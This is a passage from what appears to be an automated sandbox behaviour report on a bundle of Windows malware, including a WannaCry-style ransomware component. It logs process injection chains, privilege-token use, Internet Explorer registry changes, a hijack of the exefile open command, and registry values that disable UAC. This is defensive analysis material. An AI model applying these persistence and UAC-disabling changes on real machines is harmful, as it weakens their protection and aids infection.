File opened for modification C:\Windows\svchost.com C:\Windows\svchost.com N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{4324B073-AF3D-11EE-A0B6-E2EC48AD62A3} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\TEMPSP~1.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings C:\Windows\SysWOW64\schtasks.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings C:\ProgramData\AdobeReader\GeforceUpdater.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\TEMPEX~1.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings C:\Users\Admin\Desktop\6.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe N/A
N/A N/A C:\Users\Admin\Desktop\8.exe N/A
N/A N/A C:\Users\Admin\Desktop\8.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A
N/A N/A C:\Users\Admin\Desktop\6.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\6.exe N/A
Token: SeDebugPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\L2SecHC\dllhost.exe N/A
Token: 33 N/A C:\PROGRA~3\system.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\PROGRA~3\system.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\system32\wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected] N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5032 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 5032 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 5032 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 2676 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 2676 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
PID 2676 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 2676 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 2676 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
PID 2676 wrote to memory of 2820 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2676 wrote to memory of 2820 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2676 wrote to memory of 2820 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2676 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2676 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2676 wrote to memory of 3040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2676 wrote to memory of 3880 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2676 wrote to memory of 3880 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2676 wrote to memory of 3880 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
PID 2676 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 2676 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 2676 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
PID 3880 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\system32\cmd.exe
PID 3880 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\system32\cmd.exe
PID 3880 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\system32\cmd.exe
PID 3880 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 3880 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 3880 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\icacls.exe
PID 3028 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 3028 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 3028 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
PID 1552 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 1552 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 1552 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe C:\Users\Admin\Desktop\1.exe
PID 2676 wrote to memory of 3692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2676 wrote to memory of 3692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2676 wrote to memory of 3692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
PID 2676 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
PID 2676 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
PID 2676 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
PID 2820 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 2820 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 2820 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 2864 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp
PID 2864 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp
PID 2864 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp
PID 3692 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-SAI7O.tmp\ska2pwej.aeh.tmp
PID 3692 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-SAI7O.tmp\ska2pwej.aeh.tmp
PID 3692 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe C:\Users\Admin\AppData\Local\Temp\is-SAI7O.tmp\ska2pwej.aeh.tmp
PID 4220 wrote to memory of 5100 N/A C:\Users\Admin\Desktop\1.exe C:\Windows\system32\cmd.exe
PID 4220 wrote to memory of 5100 N/A C:\Users\Admin\Desktop\1.exe C:\Windows\system32\cmd.exe
PID 3880 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
PID 3880 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
PID 3880 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
PID 3880 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\cmd.exe
PID 3880 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\cmd.exe
PID 3880 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\cmd.exe
PID 3880 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\taskkill.exe
PID 3880 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\taskkill.exe
PID 3880 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\taskkill.exe
PID 3316 wrote to memory of 4424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3316 wrote to memory of 4424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 3316 wrote to memory of 4424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2820 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe
PID 2820 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] C:\Windows\SysWOW64\netsh.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\L2SecHC\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\System32\L2SecHC\dllhost.exe N/A
